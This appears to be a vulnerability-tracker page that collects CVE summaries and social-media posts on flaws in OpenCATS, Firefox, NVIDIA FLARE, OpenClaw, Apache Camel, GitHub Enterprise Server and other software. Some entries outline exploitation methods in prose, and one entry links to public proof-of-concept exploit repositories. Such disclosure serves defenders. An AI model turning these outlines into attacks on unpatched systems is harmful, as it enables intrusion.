OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter. Attackers can break out of the define() string context in config.php using a single quote and statement separator to inject malicious PHP code that pers

thehackerwire@mastodon.social at 2026-04-29T00:15:45.000Z ##

🟠 CVE-2026-27760 - High (8.1)

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T00:15:45.000Z ##

🟠 CVE-2026-27760 - High (8.1)

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-32644
(9.8 CRITICAL)

EPSS: 0.02%

updated 2026-04-28T20:11:56.713000

2 posts

Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys.

offseq@infosec.exchange at 2026-04-28T06:30:26.000Z ##

CVE-2026-32644 (CRITICAL, CVSS 9.2): Milesight MS-Cxx63-PD cameras have default SSL private keys, exposing encrypted traffic to interception & tampering. No patch yet — restrict access & follow vendor updates. radar.offseq.com/threat/cve-20 #OffSeq #IoTSecurity #Vulnerability

##

thehackerwire@mastodon.social at 2026-04-28T02:07:24.000Z ##

🔴 CVE-2026-32644 - Critical (9.8)

Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-20766
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:11:56.713000

1 posts

An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras.

thehackerwire@mastodon.social at 2026-04-28T02:07:15.000Z ##

🟠 CVE-2026-20766 - High (8.8)

An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40972
(7.5 HIGH)

EPSS: 0.05%

updated 2026-04-28T20:11:56.713000

1 posts

An attacker on the same network as the remote application may be able to utilize a timing attack to discover information about the remote secret. In extreme circumstances this could result in the attacker determining the secret and uploading changed classes, thereby achieving remote code execution in the remote application. Affected: Spring Boot 4.0.0–4.0.5 (fix 4.0.6), 3.5.0–3.5.13 (fix 3.5.14),

thehackerwire@mastodon.social at 2026-04-28T01:00:06.000Z ##

🟠 CVE-2026-40972 - High (7.5)

An attacker on the same network as the remote application may be able to utilize a timing attack to discover information about the remote secret. In extreme circumstances this could result in the attacker determining the secret and uploading chang...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7321
(9.6 CRITICAL)

EPSS: 0.00%

updated 2026-04-28T20:10:59.913000

2 posts

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.

thehackerwire@mastodon.social at 2026-04-28T23:38:22.000Z ##

🔴 CVE-2026-7321 - Critical (9.6)

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T23:38:22.000Z ##

🔴 CVE-2026-7321 - Critical (9.6)

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7320
(7.5 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:59.913000

2 posts

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

thehackerwire@mastodon.social at 2026-04-28T23:38:12.000Z ##

🟠 CVE-2026-7320 - High (7.5)

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T23:38:12.000Z ##

🟠 CVE-2026-7320 - High (7.5)

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24186
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:42.070000

4 posts

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.

thehackerwire@mastodon.social at 2026-04-28T22:33:32.000Z ##

🟠 CVE-2026-24186 - High (8.8)

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL at 2026-04-28T16:53:25.991Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer

##

thehackerwire@mastodon.social at 2026-04-28T22:33:32.000Z ##

🟠 CVE-2026-24186 - High (8.8)

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24178
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-04-28T20:10:42.070000

4 posts

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to privilege escalation, data tampering, information disclosure, code execution, and denial of service.

thehackerwire@mastodon.social at 2026-04-28T22:33:22.000Z ##

🔴 CVE-2026-24178 - Critical (9.8)

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL at 2026-04-28T16:53:25.991Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer

##

thehackerwire@mastodon.social at 2026-04-28T22:33:22.000Z ##

🔴 CVE-2026-24178 - Critical (9.8)

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24204
(6.5 MEDIUM)

EPSS: 0.00%

updated 2026-04-28T20:10:42.070000

2 posts

NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Improper Input Validation by path traversing. A successful exploit of this vulnerability may lead to information disclosure.

AAKL at 2026-04-28T16:53:25.991Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-3893
(9.4 CRITICAL)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials.

thehackerwire@mastodon.social at 2026-04-28T22:31:41.000Z ##

🔴 CVE-2026-3893 - Critical (9.4)

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism,
allowing an attacker with network access to directly access and modify
its configuration and operational functions without needing credentials.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T22:31:41.000Z ##

🔴 CVE-2026-3893 - Critical (9.4)

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism,
allowing an attacker with network access to directly access and modify
its configuration and operational functions without needing credentials.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41395
(7.5 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay cache detection and trigger duplicate voice-call processing with a captured valid signed webhook.

thehackerwire@mastodon.social at 2026-04-28T22:00:12.000Z ##

🟠 CVE-2026-41395 - High (7.5)

OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T22:00:12.000Z ##

🟠 CVE-2026-41395 - High (7.5)

OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41404
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, allowing self-declared scopes to persist on identity-bearing authentication paths and escalate privileges.

thehackerwire@mastodon.social at 2026-04-28T21:50:08.000Z ##

🟠 CVE-2026-41404 - High (8.8)

OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:50:08.000Z ##

🟠 CVE-2026-41404 - High (8.8)

OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41396
(7.8 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by overriding the bundled plugin trust root directory.

thehackerwire@mastodon.social at 2026-04-28T21:49:48.000Z ##

🟠 CVE-2026-41396 - High (7.8)

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by ov...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:49:48.000Z ##

🟠 CVE-2026-41396 - High (7.8)

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by ov...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41912
(7.6 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access restricted resources.

thehackerwire@mastodon.social at 2026-04-28T21:14:03.000Z ##

🟠 CVE-2026-41912 - High (7.6)

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:14:03.000Z ##

🟠 CVE-2026-41912 - High (7.6)

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41405
(7.5 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server resources by bypassing authentication checks.

thehackerwire@mastodon.social at 2026-04-28T21:13:54.000Z ##

🟠 CVE-2026-41405 - High (7.5)

OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server reso...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:13:54.000Z ##

🟠 CVE-2026-41405 - High (7.5)

OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server reso...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42422
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not undergone intended approval.

thehackerwire@mastodon.social at 2026-04-28T21:13:45.000Z ##

🟠 CVE-2026-42422 - High (8.8)

OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not u...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:13:45.000Z ##

🟠 CVE-2026-42422 - High (8.8)

OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not u...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41914
(8.5 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist policies.

thehackerwire@mastodon.social at 2026-04-28T21:02:34.000Z ##

🟠 CVE-2026-41914 - High (8.5)

OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist pol...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:02:34.000Z ##

🟠 CVE-2026-41914 - High (8.5)

OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist pol...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42423
(7.5 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that should require explicit user approval, circumventing the intended security boundary.

thehackerwire@mastodon.social at 2026-04-28T21:00:33.000Z ##

🟠 CVE-2026-42423 - High (7.5)

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:00:33.000Z ##

🟠 CVE-2026-42423 - High (7.5)

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42432
(7.8 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute privileged commands on the local assistant system.

thehackerwire@mastodon.social at 2026-04-28T21:00:16.000Z ##

🟠 CVE-2026-42432 - High (7.8)

OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute pri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:00:16.000Z ##

🟠 CVE-2026-42432 - High (7.8)

OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute pri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42431
(8.1 HIGH)

EPSS: 0.00%

updated 2026-04-28T20:10:23.367000

2 posts

OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guard and modify browser configurations.

thehackerwire@mastodon.social at 2026-04-28T21:00:05.000Z ##

🟠 CVE-2026-42431 - High (8.1)

OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guar...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-28T21:00:05.000Z ##

🟠 CVE-2026-42431 - High (8.1)

OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guar...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6785
(8.1 HIGH)

EPSS: 0.07%

updated 2026-04-28T19:45:35.750000

1 posts

Memory safety bugs present in Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird ESR 140.9, Firefox 149 and Thunderbird 149. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 150, Firefox ESR 115.35, Firefox ESR 140.10, Thunderbird 150, and Thunderbird

thehackerwire@mastodon.social at 2026-04-26T20:06:45.000Z ##

🟠 CVE-2026-6785 - High (8.1)

Memory safety bugs present in Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird ESR 140.9, Firefox 149 and Thunderbird 149. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have be...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6786
(8.1 HIGH)

EPSS: 0.06%

updated 2026-04-28T19:45:26.663000

1 posts

Memory safety bugs present in Firefox ESR 140.9, Thunderbird ESR 140.9, Firefox 149 and Thunderbird 149. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 150, Firefox ESR 140.10, Thunderbird 150, and Thunderbird 140.10.

thehackerwire@mastodon.social at 2026-04-26T20:06:54.000Z ##

🟠 CVE-2026-6786 - High (8.1)

Memory safety bugs present in Firefox ESR 140.9, Thunderbird ESR 140.9, Firefox 149 and Thunderbird 149. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40453
(9.9 CRITICAL)

EPSS: 0.21%

updated 2026-04-28T19:43:55.047000

1 posts

The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was not applied to five non-HTTP HeaderFilterStrategy implementations: JmsHeaderFilterStrategy and ClassicJmsHeaderFilterStrategy in camel-jms, SjmsHeaderFilte

thehackerwire@mastodon.social at 2026-04-27T17:03:51.000Z ##

🔴 CVE-2026-40453 - Critical (9.9)

The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was no...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40048
(7.8 HIGH)

EPSS: 0.05%

updated 2026-04-28T19:43:29.363000

1 posts

The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `<keyId>.key` files in the configured key directory using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. The cast to `java.security.KeyPair` is evaluated only after `readObject()` has already returned, so any `readObject()` side effects in the deserialized object run befor

thehackerwire@mastodon.social at 2026-04-27T17:03:42.000Z ##

🟠 CVE-2026-40048 - High (7.8)

The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `.key` files in the configured key directory using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. The cast to `java.secu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33454
(9.4 CRITICAL)

EPSS: 0.04%

updated 2026-04-28T19:42:14.580000

1 posts

The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from(\"imap://...\")

thehackerwire@mastodon.social at 2026-04-27T17:00:30.000Z ##

🔴 CVE-2026-33454 - Critical (9.4)

The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40022
(8.2 HIGH)

EPSS: 0.06%

updated 2026-04-28T19:41:41.530000

1 posts

When authentication is enabled on the Apache Camel embedded HTTP server or embedded management server (camel-platform-http-main) and a non-root context path such as /api or /admin is configured via camel.server.path or camel.management.path, the BasicAuthenticationConfigurer and JWTAuthenticationConfigurer classes derive the authentication path from properties.getPath() when camel.server.authentic

thehackerwire@mastodon.social at 2026-04-27T17:00:20.000Z ##

🟠 CVE-2026-40022 - High (8.2)

When authentication is enabled on the Apache Camel embedded HTTP server or embedded management server (camel-platform-http-main) and a non-root context path such as /api or /admin is configured via camel.server.path or camel.management.path, the B...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3854
(8.8 HIGH)

EPSS: 0.39%

updated 2026-04-28T19:37:39.507000

40 posts

An improper neutralization of special elements vulnerability was identified in GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance. During a git push operation, user-supplied push option values were not properly sanitized before being included in internal service headers. Because the internal header format used a delim

3 repos

https://github.com/5kr1pt/CVE-2026-3854

https://github.com/LACHHAB-Anas/Exploit_CVE-2026-3854

https://github.com/lysophavin18/CVE-2026-3854-PoC

newsyc250@toot.community at 2026-04-29T02:13:19.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown: wiz.io/blog/github-rce-vulnera

Discussion: news.ycombinator.com/item?id=4

##

hn250@social.lansky.name at 2026-04-29T02:10:12.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

wwahammy@treehouse.systems at 2026-04-29T01:20:29.000Z ##

There should be a "but the service is never up to be exploited" reducer on the CVE score.
wiz.io/blog/github-rce-vulnera

##

jschauma@mstdn.social at 2026-04-29T00:36:54.000Z ##

Question about the GitHub RCE:

wiz.io/blog/github-rce-vulnera says GHES patches were _released_ on 03/10.

github.blog/security/securing- says "we _prepared_ patches [...] and published CVE-2026-3854. These are _available today_".

So were GHES patches made available to customers at the time of CVE publication or only today, 1.5 months laster?

##

newsyc200@toot.community at 2026-04-28T23:23:19.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown: wiz.io/blog/github-rce-vulnera

Discussion: news.ycombinator.com/item?id=4

##

obivan at 2026-04-28T21:53:56.247Z ##

